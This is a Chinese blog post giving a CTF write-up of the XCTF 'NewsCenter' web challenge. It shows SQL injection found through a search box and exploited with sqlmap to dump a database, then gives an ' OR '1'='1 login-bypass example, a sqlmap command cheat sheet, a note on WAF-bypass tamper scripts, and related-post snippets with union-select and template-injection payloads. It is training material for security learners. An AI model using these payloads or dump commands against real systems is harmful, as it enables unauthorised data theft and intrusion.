XCTF攻防世界web进阶练习_ 1_NewsCenter

最新推荐文章于 2025-07-17 18:46:59 发布
最新推荐文章于 2025-07-17 18:46:59 发布
阅读量3.2k 收藏 9
点赞数 3
CC 4.0 BY-SA版权
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/silence1_/article/details/89707760
本文通过实战案例,详细解析了SQL注入攻击原理及利用SQLMap进行数据库漏洞探测的方法。从XCTF攻防世界web进阶练习题NewsCenter出发,介绍了如何使用SQLMap自动检测和利用SQL注入漏洞,获取数据库信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XCTF攻防世界web进阶练习—NewsCenter

题目

题目是NewsCenter,没有提示信息。
打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。
在这里插入图片描述
随便输入123,用burp抓包,发现是post方式,因为sql注入技术太菜,直接用sqlmap爆破。
将http头保存为1.txt,试试用sqlmap爆数据库
sqlmap -r 1.txt -dbs
很快,爆出数据库
在这里插入图片描述

查看news数据库内容sqlmap -r 1.txt -D news --dump
在这里插入图片描述
得到flag!

关于用sqlmap实现sql注入

sql注入

维基百科:

SQL注入(英语:SQLnjection),也称SQL注入或SQL注码, 是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。

简言之,就是利用客户端对输入语句的检查或过滤不严,输入恶意sql语句,让客户端执行自己想要执行的语句,从而达到自己的目的

最简单的SQL注入例子:

假如某个网站的登录验证的SQL查询代码为

strSQL = " SELECT * FROM users WHERE (name = '$_GET["name"]') and (pw = '$_GET["pw"]'); "

恶意填入

?name = "1' OR '1'='1"& pw = "1' OR '1'='1";

时,将导致原本的SQL字符串被填为

strSQL = "SELECT * FROM users WHERE (name = '1' OR '1'='1') and (pw = '1' OR '1'='1');"

也就是实际上运行的SQL命令会变成下面这样的

strSQL = "SELECT * FROM users;"

因此达到无账号密码,亦可登录网站。所以SQL注入被俗称为黑客的填空游戏。

当然,实际的sql注入肯定没这么简单
sql注入有很多方法,根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注等
参考:https://www.cnblogs.com/ssooking/p/8137597.html

sqlmap

简单介绍:
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供将恶意代码注入其中的选项。
它是一种渗透测试工具,可自动检测和利用SQL注入漏洞,在终端中提供其用户界面。
该软件在命令行运行,可供不同操作系统下载:Linux发行版,Windows和Mac OS操作系统。
除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据,以及查看表格中的数据,例如用户,密码,备份,电话号码,电子邮件地址,信用卡和其他机密和敏感信息。
sqlmap完全支持多个DBMS,包括MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird和SAP MaxDB。
并全面支持所有注入技术:布尔值,错误,堆栈,时间,联盟。

使用
根据sqlmap手册,分为

  • Options(选项)
  • Target(目标)
  • Request(请求)
  • Optimization(优化)
  • Injection(注入)
  • Detection(检测)
  • Techniques(技巧)
  • Fingerprint(指纹)
  • Enumeration(枚举)
  • Brute force(暴力破解)
  • User-defined function injection(用户自定义函数注入)
  • File system access(访问文件系统)
  • Operating system access(操作系统访问)
  • Windows注册表访问
  • General(一般)
  • Miscellaneous(杂项) 等多个部分,可见,sqlmap是一个非常强大的工具

常用的SQLmap语句

sqlmap -u "注入地址"     --dbs          // 列举数据库
sqlmap -u "注入地址" --tables -D "数据库" // 列举数据库的表名
sqlmap -u "注入地址" --columns -T "表名" -D "数据库" // 获取表的列名
sqlmap -u "注入地址" --dump -C "字段,字段" -T "表名" -D "数据库" // 获取表中的所有数据

sqlmap -r "含http头的文件"     --dbs          // 列举数据库
sqlmap -r "含http头的文件" --tables -D "数据库" // 列举数据库的表名
sqlmap -r "含http头的文件" --columns -T "表名" -D "数据库" // 获取表的列名
sqlmap -r "含http头的文件" --dump -C "字段,字段" -T "表名" -D "数据库" // 获取表中的所有数据

参考:http://zerlong.com/512.html

sqlmap还提供了 -tamper 选项,其中有大量脚本,可以用来花式绕waf

参考:http://www.myh0st.cn/index.php/archives/881/

攻防世界 WEB NewsCenter
ChaoYue_miku的博客
01-08 319
攻防世界 WEB NewsCenter NewsCenter:   题目只有一个搜索框,下面显示搜索结果,最先考虑的就是sql注入,先简单构造' or '1=1,果然返回了所有新闻(7条)查看网页源码,发现这里是post方式,可以考虑使用sqlmap。   但是如此形式的sql漏洞应该还有别的方法,毕竟这一看就没有任何过滤验证,也没有提前预编译,是最基础的sql漏洞了,在这里尝试手工构造语句,看看能不能获得什么信息。   通常的方法就是单引号、1、2等尝试,然...
攻防世界 web高手进阶区 9分题 Web_python_flask_sql_injection
闵行小鱼塘
10-12 1199
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是Web_python_flask_sql_injection的writeup
攻防世界 web进阶NewsCenter
trytowritecode的博客
10-11 2555
标题 攻防世界 WEB进阶区 —NewsCenter 最近刚入web这一块想想写了道ctf,新手 勿喷 这也是我第一次写博客 先看题目点开来是这样的界面 说实话一开始没有头绪,看着这个界面觉得很奇怪,但是基于之前写过的几道题我还是按开了F12开发者视图,在里面找了很久没发现什么有用的信息,然后我在想这里有输入框,会不会是xss的题目于是我就写了 发现页面也没有弹窗,于是陷入了漫长的沉思中,然后决定向以往一样先扫个目录看看于是起了dirmap 用 python dirmap.py -i 地址 -lcf
攻防世界web | easyphp 详细题解WP
最新发布
2301_80637449的博客
07-17 904
本文详细解析了攻防世界Web题目"easyphp"的解题方法,通过构造特殊输入绕过多重条件检查获取flag。关键点包括:1)利用PHP弱类型特性,使用科学计数法1e9满足$a的数值和长度要求;2)通过MD5碰撞获取$b=53724使其哈希值后6位为8b184b;3)精心构造$c={"m":"2023a","n":[[1,2],0]},利用PHP类型转换和比较特性绕过检查。文章深入分析了各漏洞点的技术原理,包括科学计数法处理、哈希
攻防世界---web---NewsCenter
2201_75556700的博客
05-18 963
5、查询列数,查3列的时候,没有报错,再查4列的时候,报错了,所以有三列。6、使用联合查询查数据库名,数据库名为news。4、接着判断注入类型,说明存在字符型注入。8、查secret_table中的字段名。2、打开链接,类似于一个搜索新闻的界面。3、因为有文本框,所以尝试注入。试着搜索第一条新闻hello。9、查fl4g字段中的值。
XCTF web NewsCenter(sqlmap简单使用)
H4ppyD0g的博客
09-12 792
打开网页是一个查询操作的输入框,判断应该存在sql注入。 随便输入一些东西后回车,用bp抓包,抓取的内容放到一个1.txt文件里面 之后用到sqlmap sqlmap.py -r 1.txt --dbs 用1.txt内容去搜索对应的所有数据库名 可以爆出两个库 sqlmap.py -r 1.txt -D news --dump 建立可后台news库连接, 搜索所有的数据 sql部分常用参数 ...
[XCTF]攻防世界Web_python_template_injection模板注入
qq_37301470的博客
11-20 3659
模板注入 在url后访问地址/{{7*7}} 返回49 于是是模板注入 payload: http://111.200.241.244:52204/{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls').read()") }}{% e
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
攻防世界 Crypto进阶 Handicraft_RSA
qtL0ng的博客
06-02 1448
1、题目 #!/usr/bin/python from Crypto.Util.number import * from Crypto.PublicKey import RSA from secret import s, FLAG def gen_prime(s): while True: r = getPrime(s) #生成一个素数r R = [r] #将r转换为列表 t = int(5 * s / 2) + 1 for i i
攻防世界 web高手进阶10分题 Background_Management_System
闵行小鱼塘
10-21 1156
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Background_Management_System的writeup
攻防世界WebNewsCenter
Light_inthe_eyes的博客
10-12 260
这道题就是简单的sql注入 1.爆裂,当为4的时候报错 ' order by 3# 2.爆库名 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# 3.爆表名: 1' union select 1,group_concat(table_name),3 from information_schema.tables.
攻防世界的部分进阶web
qq_51439282的博客
11-28 252
一、baby_web 可以看到提示本题是关于初始页面的打开题目链接我们可以看到 hello world 字样,再看到网址后面带有/1.php 一般来说初始页面是/index.php 所以我们就试试将1.php改成index.php 改完确认后发现还是初始的样子没有变化 这样我们接下来只好进行抓包 抓到包之后,我们将其发送给repeater 可以得到这样的返回,我们尝试着在这里把1.php改成index.php 发现他说flag以及隐藏起来了 之后在它的头部找到了flag 这里提供另外一种思路 在界面按
攻防世界Web高手进阶部分题目
lalala1031的博客
11-29 317
攻防世界Web高手进阶部分题目 baby_web 首先是观察题目给出的信息。 题目提示到初始页面(其实一开始,我是没注意到的,我是先进入了网址,然后又一头雾水的出来),然后就去查了网站初始页面的性质 就是一般首页的文件名都为index、default、main或portal加上扩展名。 进入场景发现该网址的格式不符合,那就改吧,先尝试把1.php改为index.php,改了之后发现还是跳回了1.php,但是在网络这出现了一个新的包。 点进去,一不小心就发现了隐藏的flag。 flag{very_ba
XCTFNewsCenter
Keepb1ue的博客
01-12 1746
一道简单的常规注入题
XCTF:NewsCenter
m0_64898960的博客
03-18 4215
xctf 因为有输入框,我习惯初步判断它为sql注入 1.测试是否存在注入点,输入 1' 结果报错了,然后尝试 1" 2.知道存在注入,且为字符型注入。然后进行字段数猜测 直到字段数为4开始报错 3.尝试获得显示位 4.查库名 5.查表名 6.查列名 7.获取flag 到这里本题就已经解出来了,下面是我在上面用到的sql语句。 1' 1" 1'order by 1# -1'union select 1,2,3# -1'uni...
XCTF_NewsCenter
TA不懒,但还没有添加简介
01-17 3055
XCTF_NewsCenter
xctf-web-NewsCenter
Spwpun的博客
03-30 2309
一个无报错回显的注入漏洞,明明一个很简单的sql注入题,我却花一个小时来做,服了自己了,依赖于sqlmap我从来没尝到甜头过,还是得对information_schema表结构有一定的理解: 查询当前数据库中的所有表名: 1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_...
攻防世界---NewsCenter
weixin_43803070的博客
07-15 547
废话不多说,直接上思路。 ** 手工注入: ** 1' //报错, 判断字段: 1' order by 3# //最终我们得到是三个字段,在这里们用--+代替#,竟然报错。 回显字段: -1' union select 1,2,3# 爆出数据库(两种方法): -1' union select 1,2,database()# -1' union select 1,2,group_conc...
xctf backup
06-14
### XCTF备份方法与工具 XCTF(X-Code Technology Framework)通常指的是一个竞赛平台或技术框架,其备份方法和工具主要依赖于具体的实现环境。以下是几种常见的备份方法和工具,适用于XCTF或其他类似的技术框架。 #### 1. 数据库备份 在XCTF中,如果使用了数据库来存储用户信息、题目数据等关键内容,则可以采用以下数据库备份方法: - **mysqldump**:对于MySQL数据库,`mysqldump` 是一种常用的备份工具。它能够导出完整的SQL脚本,便于恢复和迁移[^2]。 ```bash mysqldump -u username -p database_name > backup.sql ``` - **pg_dump**:对于PostgreSQL数据库,`pg_dump` 提供了类似的备份功能[^3]。 ```bash pg_dump -U username -d database_name -f backup.sql ``` #### 2. 文件系统备份 XCTF的文件系统可能包含题目文件、日志文件和其他静态资源。这些文件可以通过以下工具进行备份: - **rsync**:用于同步本地或远程文件系统,支持增量备份,减少传输量[^4]。 ```bash rsync -avz /source/directory/ user@remote:/destination/directory/ ``` - **tar**:将文件打包并压缩为单个存档文件,方便存储和传输[^5]。 ```bash tar -czvf backup.tar.gz /path/to/files ``` #### 3. 容器化备份 如果XCTF运行在Docker容器中,可以使用以下方法备份容器状态: - **docker commit**:将当前容器的状态保存为镜像[^6]。 ```bash docker commit container_id new_image_name ``` - **docker save**:将镜像保存为可移植的归档文件[^7]。 ```bash docker save -o backup.tar new_image_name ``` #### 4. 配置文件备份 XCTF的配置文件通常包括服务启动参数、API密钥等敏感信息。可以使用Git等版本控制工具进行管理,并通过加密工具保护敏感数据[^8]。 - **git**:记录配置文件的历史变更,便于回滚和协作。 ```bash git add config_files git commit -m "Backup configuration" ``` - **gpg**:对配置文件进行加密存储,确保安全性[^9]。 ```bash gpg --output config.gpg --encrypt config.json ``` #### 5. 自动化备份工具 为了简化备份流程,可以使用以下自动化工具: - **cron**:在Linux系统中设置定时任务,定期执行备份脚本[^10]。 ```bash crontab -e # 添加如下行以每天凌晨2点执行备份 0 2 * * * /path/to/backup_script.sh ``` - **Ansible**:通过编写Playbook实现跨服务器的备份任务自动化[^11]。 ### 示例代码 以下是一个简单的Python脚本,用于备份XCTF的关键文件并上传到远程服务器: ```python import os import shutil import paramiko def backup_xctf(source_dir, target_dir): if not os.path.exists(target_dir): os.makedirs(target_dir) shutil.make_archive(os.path.join(target_dir, 'xctf_backup'), 'zip', source_dir) def upload_to_remote(local_file, remote_path, ssh_host, ssh_port, ssh_user, ssh_key): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ssh_host, port=ssh_port, username=ssh_user, key_filename=ssh_key) sftp = ssh.open_sftp() sftp.put(local_file, remote_path) sftp.close() ssh.close() # 调用示例 backup_xctf('/var/xctf', '/tmp/backups') upload_to_remote('/tmp/backups/xctf_backup.zip', '/remote/backups/xctf_backup.zip', 'example.com', 22, 'user', '/path/to/key') ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值